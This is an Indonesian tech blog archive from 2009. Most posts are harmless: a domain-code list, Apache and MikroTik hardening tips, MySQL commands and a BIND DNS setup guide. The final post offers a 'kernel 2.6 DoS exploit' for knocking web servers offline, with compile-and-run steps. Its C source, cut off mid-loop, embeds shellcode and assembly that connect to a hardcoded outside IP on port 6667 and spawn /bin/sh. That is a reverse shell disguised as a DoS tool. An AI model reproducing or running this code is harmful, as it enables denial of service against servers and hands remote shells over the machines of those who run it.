Kamis, 31 Desember 2009



Mungkin Anda sudah pernah mengetahui buku yang kontroversial ini.Dan Mungkin Anda Sulit sekali untuk mencari Buku Gurita Cikeas ini.
Buku ini Saat ini langka di pasaran.
Mungkin Anda Ingin membacanya dengan format .pdf .
Nah Silahkan Download Disini.

Selamat Membaca.

Jumat, 11 Desember 2009

YouTube.com merupakan situs video yang paling populer. Hampir semua jenis video ada di sana, kecuali video xxx tentunya :-D. Ada kalanya mungkin Anda ingin menyimpan (download) video yang ada di Youtube, sehingga Anda bisa menontonnya kembali kapan saja (tidak harus konek dengan internet).

Berikut ini kami tampilkan lima software yang dapat Anda gunakan untuk mendownload video dari youtube:

1. YouTube Downloader

Merupakan software untuk download video dari YouTube, Google Video, Yahoo Video serta mengkonversi file video tersebut dalam format MOV, MP4, WMV, AVI, dll.

2. Youtube Downloader HD

Sesuai dengan namanya, Anda dapat mendownload High Quality video, High Definition dan Full HD video dari Youtube dengan menggunakan Youtube Downloader HD.

3. Free FLV Converter

Dengan FLV Converter Anda bisa mencari, mendownload dan mengconvert file video dari Youtube, Meta Cafe, Daily Motion, dll. Yang cukup menarik dari software ini adalah Anda dapat mendownload beberapa video sekaligus.

4. Online FLV Converter

Ini merupakan layanan online, jadi Anda tidak perlu menggunakan software bantu lain untuk mendownload video dari Youtube. Anda hanya tinggal memasukkan URL video yang akan didownload dan memilih tipe file videonya.

5. DownloadHelper

DownloadHelper merupakan firefox addons yang dapat Anda gunakan untuk mendownload video dari ratusan situs video. Dari beberapa software di atas DownloadHelper memang paling lengkap.

Di antara lima tools di atas mana yang Anda pilih? Atau mungkin Anda punya alternatif lain yang lebih menarik?

Rabu, 09 Desember 2009

Paling malas rasanya kalau harus mendengarkan Voicemail yang masuk ketika ponsel kita tidak aktif dan harus dial ke nomer tertentu untuk mendengarkannya. Kalau pesannya memang penting mungkin kita akan was-was, tapi kalau pesannya tidak terlalu penting, rasanya hanya akan menghabiskan waktu saja.

Melihat hal tersebut, AT&T menawarkan solusi lain yaitu dengan layanan voicemail-to-text, dimana layanan ini mampu menterjemahkan Voicemail yang masuk dan mengirimkannya dalam bentuk teks ke ponsel kita. Kita juga bisa membaca pesannya di komputer ataupun langsung dari ponsel saja.

Untuk berlangganan, Anda akan dikenai biaya sekitar 9.99 USD atau sekitar 100 ribu rupiah per bulannya, maka layanan ini akan dapat :

* Menerima Voicemail yang masuk dalam menterjemahkan langsung menjadi teks, e-mail ataupun keduanya

* Anda dapat merespon pesan yang masuk ini, dengan menelpon ke nomor orang yang mengirimkan Voicemail, membalasnya melalui e-mail ataupun SMS

* Melakukan pengalihan voicemail dalam bentuk teks ataupun e-mail

* Menyimpan Voicemail pada ponsel ataupun komputer selama Anda inginkan

* Voicemail model lama akan tetap bisa diakses, jadi Anda tetap bisa mendengarkan Voicemail dengan cara menelpon ke kotak suara Anda kapanpun dan dimanapun Anda inginkan.

Tertarik untuk menggunakannya?

Berada di keramaian, kadang bisa menjadi suatu hal yang tidak aman. Begitu banyak orang yang lalu lalang, sehingga bisa saja menjadi motif terjadinya kejahatan. Misalnya saja kalau kita sedang berada di bus yang padat penumpangnya, kalau kita kurang hati-hati, bisa saja terjadi kecopetan. Hal ini sangat rentan terjadi, makanya perlu ada tindakan perventif untuk menghindarinya agar tidak terjadi.

Salah satunya mungkin akan bisa menggunakan dompet digital iWallet. Ini memang bukan dompet biasa karena iWallet merupakan dompet yang mampu menyimpan uang cash dan kartu kredit dan sebagainya dengan sangat aman.

iWallet ini terbuat dari fiber glass. Selain itu benda ini dilengkapi dengan biometric yang dapat membaca sidik jari, yang mana artinya hanya Anda saja yang dapat membuka dompet tersebut.

Dompet digital ini sudah mendukung penuh Bluetooth dan dapat dikoneksikan ke ponsel. Yang mana artinya kalau terjadi kecopetan, Anda bisa mendeteksi iWallet melalui ponsel yang mana berjarak antara 5-10 meter, kalau ternyat a jaraknya lebih dari itu maka alarm di ponsel Anda akan berbunyi.

Dompet ini tersedia dengan berbagai pilihan warna. Untuk memilikinya Anda harus merogoh kantong sekitar 299 USD atau sekitar 3 juta rupiah. Sedangkan untuk model Carbon Fiber dan Kevler dibandrol dengan kisaran harga 599.95 USD atau sekitar 6 juta rupiah. Hmmm, cukup mahal sekali bukan untuk ukuran sebuah dompet, tapi akan lebih baik isi dompetnya pun lebih bernilai dibandingkan dompetnya.
Nama domain adalah nama unik yang diberikan untuk mengidentifikasi nama jaringan komputer ataupun internet. Nama domain berfungsi untuk mempermudah pengguna di internet pada saat melakukan akses ke server, selain juga dipakai untuk mengingat nama server yang dikunjungi tanpa harus mengenal deretan angka yang rumit yang dikenal sebagai IP address. Nama domain ini juga dikenal sebagai sebuah kesatuan dari sebuah situs web seperti contohnya "jasakom.com". Nama domain kadang-kadang disebut pula dengan istilah URL, atau alamat website.

Merupakan top level domain yang diberikan untuk mencirikan negara dari internet domain name. Berikut ini adalah daftar Top Level Negara-negara di Dunia yang dikeluarkan oleh Internet Assign Numbers Authority (IANA). IANA adalah salah satu badan independent yang mengatur masalah pengaturan Domain Internet. Saat ini (per tanggal 1 Januari 2002) terdaftar sebanyak 243 Negara yang terdaftar.

A
.ac – Pulau Ascension *
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda *
.ai – Anguilla
.al – Albania
.am – Armenia *
.an – Antillen Belanda
.ao – Angola
.aq – Antartika
.ar – Argentina
.as – Samoa Amerika *
.at – Austria *
.au – Australia
.aw – Aruba
.ax – Åland
.az – Azerbaijan

B
.ba – Bosnia Herzegovina
.bb – Barbados
.bd – Bangladesh
.be – Belgia *
.bf – Burkina Faso
.bg – Bulgaria
.bh – Bahrain
.bi – Burundi *
.bj – Benin
.bm – Bermuda
.bn – Brunei Darussalam
.bo – Bolivia *
.br – Brasil *
.bs – Bahama *
.bt – Bhutan
.bv – Pulau Bouvet (tidak dipakai dan tidak terdaftar)
.bw – Botswana
.by – Belarus
.bz – Belize *

C
.ca – Kanada
.cc – Pulau Cocos *
.cd – Republik Demokratik Kongo (dulunya .zr – Zaire) *
.cf – Republik Afrika Tengah
.cg – Republik Kongo *
.ch – Swiss *
.ci – Côte d'Ivoire (Pantai Gading)
.ck – Kepulauan Cook *
.cl – Chili
.cm – Kamerun
.cn – Republik Rakyat Tiongkok *
.co – Kolombia
.cr – Kosta Rika
.cs – Serbia dan Montenegro (dulunya .yu – Yugoslavia; Catatan: pada tanggal 3 Juni, 2006, Montenegro mendeklarasikan kemerdekaannya, sehingga domain ini tidak dipakai lagi.) (kode domain .cs tidak dipakai, tidak ada DNS) (kode domain .cs dulunya dipakai untuk Cekoslowakia)
.cu – Kuba
.cv – Tanjung Verde
.cx – Pulau Natal *
.cy – Siprus
.cz – Republik Ceko

D
.de – Jerman
.dj – Djibouti *
.dk – Denmark *
.dm – Dominika
.do – Republik Dominika
.dz – Aljazair (Algeria)

E
.ec – Ekuador
.ee – Estonia
.eg – Mesir
.eh – Sahara Barat (tidak dipakai; tidak ada DNS)
.er – Eritrea
.es – Spanyol *
.et – Ethiopia
.eu – Uni Eropa (kode domain yang "dikhususkan" oleh ISO 3166-1)

F
.fi – Finlandia
.fj – Fiji *
.fk – Kepulauan Falkland
.fm – Federasi Mikronesia *
.fo – Kepulauan Faroe
.fr – Perancis

G
.ga – Gabon
.gb – Britania Raya (Reserved domain by IANA; deprecated – see .uk)
.gd – Grenada
.ge – Georgia
.gf – Guyana Perancis
.gg – Guernsey
.gh – Ghana
.gi – Gibraltar
.gl – Greenland *
.gm – Gambia
.gn – Guinea
.gp – Guadeloupe
.gq – Guinea Khatulistiwa
.gr – Yunani *
.gs – Georgia Selatan dan Kepulauan Sandwich Selatan *
.gt – Guatemala
.gu – Guam
.gw – Guinea Bissau
.gy – Guyana

H
.hk – Hong Kong *
.hm – Pulau Heard dan Kepulauan McDonald *
.hn – Honduras *
.hr – Kroasia
.ht – Haiti
.hu – Hongaria *

I
.id – Indonesia
.ie – Republik Irlandia
.il – Israel *
.im – Pulau Man *
.in – India *
.io – Teritorial Britania di Samudra Hindia *
.iq – Irak
.ir – Iran *
.is – Islandia
.it – Italia

J
.je – Jersey
.jm – Jamaika
.jo – Yordania
.jp – Jepang

K
.ke – Kenya
.kg – Kirgizstan
.kh – Kamboja
.ki – Kiribati
.km – Komoro
.kn – Saint Kitts dan Nevis
.kp – Korea Utara (tidak dipakai; tidak ada DNS)
.kr – Korea Selatan
.kw – Kuwait
.ky – Kepulauan Cayman
.kz – Kazakhstan *

L
.la – Laos *
.lb – Lebanon
.lc – Saint Lucia
.li – Liechtenstein *
.lk – Sri Lanka
.lr – Liberia
.ls – Lesotho
.lt – Lituania
.lu – Luxemburg
.lv – Latvia *
.ly – Libya *

M
.ma – Maroko
.mc – Monako
.md – Moldova *
.me – Montenegro
.mg – Madagaskar
.mh – Kepulauan Marshall
.mk – Republik Makedonia
.ml – Mali
.mm – Myanmar
.mn – Mongolia *
.mo – Makau
.mp – Kepulauan Mariana Utara *
.mq – Martinique
.mr – Mauritania
.ms – Montserrat *
.mt – Malta
.mu – Mauritius *
.mv – Maladewa
.mw – Malawi *
.mx – Meksiko *
.my – Malaysia
.mz – Mozambik

N
.na – Namibia *
.nc – Kaledonia Baru
.ne – Niger
.nf – Pulau Norfolk *
.ng – Nigeria
.ni – Nikaragua
.nl – Belanda * (ccTLD terdaftar pertama)
.no – Norwegia
.np – Nepal
.nr – Nauru *
.nu – Niue *
.nz – Selandia Baru *

O
.om – Oman

P
.pa – Panama
.pe – Peru
.pf – Polinesia Perancis
.pg – Papua Nugini
.ph – Filipina *
.pk – Pakistan *
.pl – Polandia *
.pm – Saint-Pierre dan Miquelon
.pn – Kepulauan Pitcairn *
.pr – Puerto Riko *
.ps – Otoritas Nasional Palestina *
.pt – Portugal *
.pw – Palau
.py – Paraguay

Q
.qa – Qatar

R
.re – Réunion
.ro – Rumania *
.rs – Serbia
.ru – Rusia *
.rw – Rwanda

S
.sa – Arab Saudi
.sb – Kepulauan Solomon *
.sc – Seychelles *
.sd – Sudan
.se – Swedia *
.sg – Singapura
.sh – Saint Helena *
.si – Slovenia
.sj – Svalbard dan Jan Mayen (tidak dipakai; tidak terdaftar)
.sk – Slowakia
.sl – Sierra Leone
.sm – San Marino *
.sn – Senegal
.so – Somalia *
.sr – Suriname *
.st – Sao Tome dan Principe *
.su – Uni Soviet (terdepresiasi; digantikan; kode domain "dipakai untuk pergantian" oleh ISO 3166-1)
.sv – El Salvador
.sy – Suriah *
.sz – Swaziland *

T
.tc – Kepulauan Turks dan Caicos
.td – Chad
.tf – Teritorial Perancis Selatan
.tg – Togo *
.th – Thailand
.tj – Tajikistan *
.tk – Tokelau *
.tl – Timor Leste (dulunya .tp) *
.tm – Turkmenistan *
.tn – Tunisia
.to – Tonga *
.tp – Timor Timur (terdepresiasi – gunakan .tl; kode domain "dipakai untuk pergantian" oleh ISO 3166-1)
.tr – Turki
.tt – Trinidad dan Tobago *
.tv – Tuvalu *
.tw – Republik China (Taiwan) *
.tz – Tanzania

U
.ua – Ukraina
.ug – Uganda *
.uk – Inggris (kode domain yang "dikhususkan" oleh ISO 3166-1) (lihat pula .gb)
.us – Amerika Serikat *
.uy – Uruguay
.uz – Uzbekistan

V
.va – Vatikan
.vc – Saint Vincent dan Grenadines *
.ve – Venezuela
.vg – Kepulauan Virgin Britania Raya *
.vi – Kepulauan Virgin Amerika Serikat
.vn – Vietnam
.vu – Vanuatu *

W
.wf – Wallis dan Futuna
.ws – Samoa (dulunya Samoa Barat) *

Y
.ye – Yaman
.yt – Mayotte
.yu – Yugoslavia (kemudian berganti nama menjadi Serbia dan Montenegro)

(kode domain secara resmi digantikan oleh .cs (lihat di atas) namun tetap dipakai; kode domain "dipakai untuk pergantian" oleh ISO 3166-1)

Z
.za – Afrika Selatan *
.zm – Zambia
.zw – Zimbabwe

Tidak bersponsor
.biz .com .edu .gov .info .int .mil .name .net .org

Bersponsor
.aero .cat .coop .jobs .mobi .museum .pro .tel .travel

Infrastruktur
.arpa .root

Startup phase
.asia

Diusulkan
.berlin .bzh .cym .gal .geo .kid .kids .mail .nyc .post .sco .web .xxx

Dihapus
.nato

Dipesan
.example .invalid .localhost .test

Pseudo-domain
.bitnet .csnet .ip .local .onion .uucp

Selasa, 27 Oktober 2009

1. Mengamankan lingkungan jaringan
2. mengamankan Sistem Operasi
3. Mendownload software baru
4. Langkah pertama sebelum menginstall Apache
5. Selektif memilih modul-modul apache
6. Mengcompilasi dan menginstall Software dengan aman
7. Mengkonfigurasi Apache dengan Aman
8. Melakukan chroot pada server
9. Langkah terakhir

10. Panduan-panduan untuk membuat konfigurasi Apache Lebih Aman
a. Pastikan kita menginstall patch-patch keamanan terbaru.
b. Sembunyikan angka VERSI Apache dan Informasi-Informasi sensitif lainnya.
c. Pastikan Apache berjalan di bawah Account User dan Groupnya sendiri
d. Pastikan file-file di luar root website tidak dilayani
e. Matikan browsing Direktori
f. Matikan server side Include (SSI)
g. Matikan Eksekusi CGI
h. Jangan membiarkan Apache mengikuti Link-link simbolis
i. Matikan Multi Option
j. Matikan dukungan untuk file-file .htaccess
k. jalankan mod_security
l. Matikan semua Modul yang tidak perlu
m. Pastikan hanya root yang memiliki akses pada file config dan binary apache
n. Turunkan Nilai Timeout
o. Batasi Request-Request yang Besar
p. Membatasi Ukuran Body XML
q. Pembatasan Concurency
r. Pembatasan Akses Berdasarkan IP
s. Menyesuaikan Setting Keep A Live
t. Menjalankan Apache dalam Lingkungan Chroot
Source:Jasakom
kita bisa menggunakan mikrotik menjadi hardisk eksternal di jaringan...
dengan menggunakan ftp :

Code: Select all
http://biznetnetworks.dl.sourceforge.net/sourceforge/winscp/winscp419setup.exe



semoga terbantu..
Untuk membuat Mikrotik menjadi proxy server sangat mudah ko...
cuman begini :
[cyber@MutMicrotik] > ip proxy print
enabled: no
src-address: 0.0.0.0
port: 8080
parent-proxy: 0.0.0.0
parent-proxy-port: 0
cache-administrator: "webmaster"
max-cache-size: unlimited

cache-on-disk: no
max-client-connections: 600
max-server-connections: 600
max-fresh-time: 3d
serialize-connections: no
always-from-cache: no
cache-hit-dscp: 4
[cyber@MutMicrotik] > ip proxy set enabled=yes
[cyber@MutMicrotik] > ip proxy print
enabled: yes
src-address: 0.0.0.0
port: 8080
parent-proxy: 0.0.0.0
parent-proxy-port: 0
cache-administrator: "webmaster"
max-cache-size: unlimited
cache-on-disk: no
max-client-connections: 600
max-server-connections: 600
max-fresh-time: 3d
serialize-connections: no
always-from-cache: no
cache-hit-dscp: 4
cache-drive: primary-master
[cyber@MutMicrotik] >
Source:Jasakom
Bagi anda yang menggunakan MySQL sebagai Basis Data sistem anda, ada beberapa perintah praktis yang dapat diterapkan setelah masuk ke prompt MySQL.
Untuk masuk ke prompt My SQL dapat dilakukan dengan mengetikan perintah :
unix # mysql
Setelah di prompt mySQL anda tinggal mengetikkan perintah-perintah praktis yang anda kehendaki. Perintah praktis tersebut diantaranya:
1. Menggunakan database yang ada:
mysql> use name_database;
2. Buat databse baru:
mysql> create database nama_database;
3. Buat tabel Baru:
mysql>create table nama_tabel deskripsi_field;
mysql>create table tabelku nama char(30 not null,nim int not null,tgl date not null;

4. Edit tabel:
mysql alter tabel nama_tabel,[add|chane|delete] deskripsi_field;
5. Hapus tabel:
mysql>drop table nama_tabel;
6. Buat data baru:
mysql> insert into nama_tabel (field1,field2,...) values (nilai1,nilai2,...) [where...];
insert into tabelku (nama,nim,tgl) values(dian, 100, 22/02/1980 divkom);
7. Ubah data :
mysql>update table nama_tabel set [field]=[nilai][where..];
8. Hapus Data:
mysql>delete from nama_tabel [where...];
9. Menampilkan tabel dalam database mysql:
mysql> show tables from mysql;
10. Melihat kolom-kolom field dalam table user:
mysql>show fields from user from mysql;
11. Melihat Host, User, Password yang telah diisi secara otomatis
mysql>select Host,use,Password from user;
12. Mengganti password root:
mysql> update user set password=password(mysqladmin where user=root;
13. Hapus entry yang tidak ada user/passwordnya, untuk keperluan security. jangan sampai akses tanpa user bidsa masuk:
mysql> delete from user where user= ;
14. Melihat informasi previlige dari user root:
mysql>select *from user where host=localhost;
15. Menambahkan user baru ke tabel user:
mysql>insert into user values(akhdian.net, dian,password(dian),Y,Y,Y,Y,Y,Y,Y.Y,Y,Y);
16. Agar konfigurasi user terbaru bisa aktif, beri perintah reload:
unix#mysqladmin reload
sedikit kasih tutorial singkat bagaimana membuat DNS server menggunakan BIND (Berkeley Internet Name Domain). Sebelum kita membangunnya ada sedikit teori untuk mengenal lebih jauh tentang DNS. Ada pepatah mengatakan "tak kenal maka tak sayang" :D , sebelum kita mengerti "DNS poisoning" atau apapun namanya sudah pasti harus mengenal dulu apa itu DNS dan bagaimana dia bekerja. Saatnya sebentar kita pakai topi putih


Komponen DNS
Kompnen DNS dibagi menjadi 4 bagian yaitu:
1. DNS server
Komputer yang bertugas menjalankan program dari server DNS, contoh BIND. BIND menampung database DNS berisi informasi struktur pohon atau pengartian nama dari sebuah permintaan DNS client.
2. DNS Zone
Merupakan penampung dari penamaan untuk server yang berhak atasnya. Contoh sebuah server DNS memiliki otoritas untuk university.ac.id dan university.edu dan setiap zone dapat disertakan satu atau lebih domain
3. DNS resolver
sebuah service yang menggunakan protocol DNS untuk meminta informasi dari DNS server
4. Resource record
arah masuknya database DNS yang digunakan untuk menjawab permintaan client.
================================================================================
DNS resource records types:
TYPE Value and meaning Reference
----------- --------------------------------------------- ---------
A 1 a host address [RFC1035]
NS 2 an authoritative name server [RFC1035]
MD 3 a mail destination (Obsolete - use MX) [RFC1035]
MF 4 a mail forwarder (Obsolete - use MX) [RFC1035]
CNAME 5 the canonical name for an alias [RFC1035]
SOA 6 marks the start of a zone of authority [RFC1035]
MB 7 a mailbox domain name (EXPERIMENTAL) [RFC1035]
MG 8 a mail group member (EXPERIMENTAL) [RFC1035]
MR 9 a mail rename domain name (EXPERIMENTAL) [RFC1035]
NULL 10 a null RR (EXPERIMENTAL) [RFC1035]
WKS 11 a well known service description [RFC1035]
PTR 12 a domain name pointer [RFC1035]
HINFO 13 host information [RFC1035]
MINFO 14 mailbox or mail list information [RFC1035]
MX 15 mail exchange [RFC1035]
TXT 16 text strings [RFC1035]
RP 17 for Responsible Person [RFC1183]
AFSDB 18 for AFS Data Base location [RFC1183]
X25 19 for X.25 PSDN address [RFC1183]
ISDN 20 for ISDN address [RFC1183]
RT 21 for Route Through [RFC1183]
NSAP 22 for NSAP address, NSAP style A record [RFC1706]
NSAP-PTR 23 for domain name pointer, NSAP style [RFC1348]
SIG 24 for security signature [RFC4034][RFC3755][RFC2535]
KEY 25 for security key [RFC4034][RFC3755][RFC2535]
PX 26 X.400 mail mapping information [RFC2163]
GPOS 27 Geographical Position [RFC1712]
AAAA 28 IP6 Address [RFC3596]
LOC 29 Location Information [RFC1876]
NXT 30 Next Domain - OBSOLETE [RFC3755][RFC2535]
EID 31 Endpoint Identifier [Patton]
NIMLOC 32 Nimrod Locator [Patton]
SRV 33 Server Selection [RFC2782]
ATMA 34 ATM Address [ATMDOC]
NAPTR 35 Naming Authority Pointer [RFC2915][RFC2168]
KX 36 Key Exchanger [RFC2230]
CERT 37 CERT [RFC4398]
A6 38 A6 (Experimental) [RFC3226][RFC2874]
DNAME 39 DNAME [RFC2672]
SINK 40 SINK [Eastlake]
OPT 41 OPT [RFC2671]
APL 42 APL [RFC3123]
DS 43 Delegation Signer [RFC4034][RFC3658]
SSHFP 44 SSH Key Fingerprint [RFC4255]
IPSECKEY 45 IPSECKEY [RFC4025]
RRSIG 46 RRSIG [RFC4034][RFC3755]
NSEC 47 NSEC [RFC4034][RFC3755]
DNSKEY 48 DNSKEY [RFC4034][RFC3755]
DHCID 49 DHCID [RFC4701]
NSEC3 50 NSEC3 [RFC5155]
NSEC3PARAM 51 NSEC3PARAM [RFC5155]
Unassigned 52-54
HIP 55 Host Identity Protocol [RFC5205]
NINFO 56 NINFO [Reid]
RKEY 57 RKEY [Reid]
Unassigned 58-98
SPF 99 [RFC4408]
UINFO 100 [IANA-Reserved]
UID 101 [IANA-Reserved]
GID 102 [IANA-Reserved]
UNSPEC 103 [IANA-Reserved]
Unassigned 104-248
TKEY 249 Transaction Key [RFC2930]
TSIG 250 Transaction Signature [RFC2845]
IXFR 251 incremental transfer [RFC1995]
AXFR 252 transfer of an entire zone [RFC1035]
MAILB 253 mailbox-related RRs (MB, MG or MR) [RFC1035]
MAILA 254 mail agent RRs (Obsolete - see MX) [RFC1035]
* 255 A request for all records [RFC1035]
Unassigned 256-32767
TA 32768 DNSSEC Trust Authorities [Weiler] 2005-12-13
DLV 32769 DNSSEC Lookaside Validation [RFC4431]
Unassigned 32770-65279
Private use 65280-65534
Reserved 65535
=============================================================================
Informasi yang dikirim client ke DNS server:
- Nama domain DNS dengan status sebagai FQDN (Full Quallified Domain Name)
- Tipe permintaan yang spesifik ke sebuah sumber daya record berdasarkan tipe atau spesialisasi tipe operasi permintaan
- spesifik kelas untuk nama domain DNS

Resolusi DNS
secara skenario mendasar DNS client menghubungi DNS server untuk melakukan process terhadap database dari sumber daya record.
Proses permintaan DNS
Permintaan terhadap DNS server dibagi 2 proses:
1. Name request yang dimulai dari komp client kemudian dilewatkan ke DNS client untuk resolusi.
2. ketika request tidak dapat diartikan secara lokal, DNS Server dapat melakukan proses untuk mengartikan nama DNS

Instalasi DNS server pada mesin RedHat 9
umumnya setiap distro linux menggunakan paket aplikasi BIND untuk mengaktifkan DNS server nya. Biasanya tersedia di dalam CD distribusinya, disini saya menggunakan bind-9.2.1-16.i386.rpm
ada baiknya kita cek dulu paket tersebut sudah tersedia di dalam sistem kita atau belum
===================================================================================
$ rpm -qa | grep bind
===================================================================================
jika belum tersedia silahkan instal BIND melalui paket rpm nya
===================================================================================
$ rpm -Uvh bind-9.2.1-16.i386.rpm
===================================================================================
jika sudah terinstall kita akan masuk ke tahap konfigurasi, berikut saya asumsikan contoh kasusnya:

router:
eth0 = 202.154.20.2 (public)
eth1 = 192.168.2.1 (private)
default gateway = 202.154.20.1(public)

DNS server:
eth0 = 202.154.20.3 (public)
default gateway = 202.154.20.1(public)

client-client:
192.168.2.2-254
default gateway = 192.168.2.1(private)

step 1
edit file /etc/named.conf
tambahkan baris untuk melakukan penambahan domain terpilih:
=============================================================================
Code:

zone "domainku.or.id" in {
type master;
file "domainku.or.id.zone";
};

zone "20.154.202.in-addr.arpa" {
type master;
file "202.154.20.rev";
};
==============================================================================

step2
setelah dibentuk nama file zone untuk domain,yang dalam kondisi default diletakkan di direktori /var/named, maka berikutnya file /var/named/domainku.or.id.zone dan /var/named/202.154.20.rev perlu dibuat.
namefile
===============================================================================
; Domains defined in this file:
; domainku.or.id.zone
;
$TTL 86400
$ORIGIN domainku.or.id.
@ IN SOA domainku.or.id. hostmaster.domainku.or.id. (
2006042500 ; serial
28800 ; refresh
7200 ; retry
604800 ; expire
86400 ; minimum
)
IN A 202.154.20.3
IN NS domainku.or.id.
IN MX 10 domainku.or.id.
;
localhost IN A 127.0.0.1

gw IN A 202.154.20.1
gw IN A 192.168.2.1
router IN A 202.154.20.2
host IN A 202.154.20.3

www IN CNAME host.domainku.or.id.
ftp IN CNAME host.domainku.or.id.
pop IN CNAME host.domainku.or.id.
smtp IN CNAME host.domainku.or.id.
=======================================================================
step3
namefile
========================================================================
; Domains defined in this file:
; 202.154.20.rev
;
$ORIGIN 20.154.202.in-addr.arpa.
@ IN SOA domainku.or.id. hostmaster.domainku.or.id. (
2006042500 ; serial
28800 ; refresh
7200 ; retry
604800 ; expire
86400 ; minimum
)
IN NS domainku.or.id.

1 IN PTR gw.domainku.or.id.
2 IN PTR router.domainku.or.id.
3 IN PTR host.domainku.or.id.
==========================================================================
resolver pada client
semua aplikasi yang membutuhkan DNS memakai resolver.
proses resolving:
1. mengajukan permintaan terhadap name server
2. menginterpretasikan permintaan (resolve), dan memberikan response
3. mengembalikan informasi kepada program yang memintanya

resolver akan menjawab dengan 2 cara yaitu:
1. melihat isi dari cache yang pernah ditanyakan sebelumnya
2. menanyakan kepada DNS server untuk mendapatkan hasilnya
resolver yang biasa dipergunakan untuk mencari informasi tentang DNS adalah nslookup
untuk mengaktifkan fungsi resolver pada OS Linux adalah dengan melakukan konfigurasi pada file /etc/resolv.conf
namefile
=====================================================================================
# /etc/resolv.conf - DNS setup file
#
domain domainku.or.id
search domainku.or.id
nameserver 202.154.20.2
# antisipasi jika domain dalam terjadi masalah maka akan diteruskan ke DNS public misal ISP
#
nameserver 202.154.1.2 # ns1.ISPku.net.id
nameserver 202.154.3.2 # ns2.ISPku.net.id
=====================================================================================

Source:Jasakom
Edit httpd.conf
=====================================
ServerSignature Off
ServerTokens Prod
=====================================
nah supaya nama apache ganti Setting Prod, server: Apache
ganti aja dengan
"superman"
Sekarang saatnya saya berbagi tips ..
melindungi mikrotik dari serangan DDOS...

carannya adalah dengan mendisable paket icmp..
ketik perintah...
======================================================
[cyber@MutMicrotik] /ip firewall filter> print
Flags: X - disabled, I - invalid, D - dynamic
[cyber@MutMicrotik] /ip firewall filter> add chain=input protocol=icmp action=
drop
[cyber@MutMicrotik] /ip firewall filter> print
Flags: X - disabled, I - invalid, D - dynamic
0 chain=input action=drop protocol=icmp
======================================================
Nah saya tambahkan lagi...
biasanya attacker mencari IP yang sesungguhnya...
IP Publicnya sudah kita sembunyikan dengan settingan NAT yang kemarin...
nah untuk settingan NAT baca tulisan yang kemarin ya...

dan sekarang kita matikan semua service yang terbuka :
=======================================================
[cyber@MutMicrotik] /ip service> set telnet disabled=yes
[cyber@MutMicrotik] /ip service> set ftp disabled=yes
[cyber@MutMicrotik] /ip service> set www disabled=yes
[cyber@MutMicrotik] /ip service> print
Flags: X - disabled, I - invalid
# NAME PORT ADDRESS CERTIFICATE
0 X telnet 23 0.0.0.0/0
1 X ftp 21 0.0.0.0/0
2 X www 80 0.0.0.0/0
3 X www-ssl 443 0.0.0.0/0 none
4 X api 8728 0.0.0.0/0
5 winbox 8291 0.0.0.0/0
========================================================
Lihatlah sekarang saya akan mencoba untuk melakukan ping ke server server :
========================================================
:\Users\grimripper>ping 192.168.10.200

Pinging 192.168.10.200 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.10.200:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
=========================================================
padahal server saya nyala dan web bisa tetap jalan lho....

Semoga server anda terlindungi dari ddos...
Semoga bermanfaat ...

Source:Jasakom

Senin, 12 Oktober 2009

Bagi yg mao kill web 1 server bisa pake ini ja exploit buat dos bikinan ane si pemalas, syarat: server web kudu socket enabled (ga perlu bisa raw gapapa), kudu musti boleh ngefork

Local Kernel 2.6.x Denial Of Service Exploit with socket function and fork enabled
programmer : mywisdom (murder of odybx and cyber tank)

Download:Disini

Tested on:

- kernel 2.6.28
- kernel 2.6.21
- kernel 2.6.24
greetz:all jasakom crew, all devilzc0de crew, all ycl crew
special thanks:special thanks: gunslinger,peneter, peti mati,wendy182,
v3n0m,flyv666,7460,cyber mutaqqin,comrade, and so on.
Cara pakai:
gcc -o masplo masplo.c
./masplo &

(jika ingin dilakukan berulang ulang)
atau bisa juga begini:
gcc -o masplo masplo.c
./masplo



source filename:odybxkill.c

//Local Kernel 2.6.x Denial of Service Exploit with socket enabled
//C0d3r: mywisdom ( murder of odybx and cyber tank )
//thanks: all jasakom crew, all devilzc0de crew, all ycl crew
//special thanks: gunslinger,peneter, peti mati, v3n0m,flyv666,7460,cyber mutaqqin and so on.
//no race condition sploitzzzz
#include
#include
void peneter()
{
printf("\nOdybx Was Killed version 1.0 local kernel 2.6 dos with socket sendpage enabledn");
printf("\nFree provided by mywisdom creator of kiss of death technic\n");
printf("\nTrying to kill this server in minutes..please wait \n");
}
void xxx()
{
char esc = 27;
printf("%c%s",esc,"[2J");
printf("%c%s",esc,"[1;1H");

}

void v3n0m()
{
char socketz[] ="/0x6a/0x66/0x58/0x6a/0x01/0x5b/0x31/0xc9/0x51/"
"/0x6a/0x01/0x6a/0x02/0x89/0xe1/0xcd/0x80/0x68/"
"/0x7c/0x52/0x9a/0x79/0x66/0x68/0x1a/0x0b/"
"/0x66/0x6a/0x02/0x89/0xe1/0x6a/0x10/0x51/0x50/"
"/0x89/0xe1/0x89/0xc6/0x6a/0x03/0x5b/0x6a/0x66/0x58"
"/0xcd/0x80/"
"/0xbb/0xb8/0x01/0xcd/0x80";
(*(void (*)()) socketz)();

}

void gunslinger()
{
__asm__ ("push $0x66 \n\t"
"pop %eax\n\t"
"push $0x1\n\t"
"pop %ebx\n\t"
"xor %ecx,%ecx\n\t"
"push %ecx\n\t"
"push $0x1\n\t"
"push $0x2\n\t"
"mov %esp,%ecx\n\t"
"int $0x80\n\t"
"push $0x799a527c\n\t"
"pushw $0x0b1a\n\t"
"pushw $0x2\n\t"
"mov %esp,%ecx\n\t"
"push $0x10\n\t"
"push %ecx\n\t"
"push %eax\n\t"
"mov %esp,%ecx\n\t"
"mov %eax,%esi\n\t"
"push $0x3\n\t"
"pop %ebx\n\t"
"push $0x66\n\t"
"pop %eax\n\t"
"int $0x80 \n\t"
"xchg %esi,%ebx\n\t"
"push $0x2\n\t"
"pop %ecx\n\t"
"dup_loop:\n\t"
"mov $0x3f,%al\n\t"
"int $0x80\n\t"
"dec %ecx\n\t"
"jns dup_loop\n\t"
"mov $0xb,%al\n\t"
"xor %edx,%edx\n\t"
"push %edx\n\t"
"push $0x68732f2f\n\t"
"push $0x6e69622f\n\t"
"mov %esp,%ebx\n\t"
"push %edx\n\t"
"push %ebx\n\t"
"mov %esp, %ecx\n\t"
"int $0x80\n\t"
);

}

int main()
{
xxx();
int hack;
int iseng;
for (hack=1;;)
{
while (iseng<2)
{
peneter();
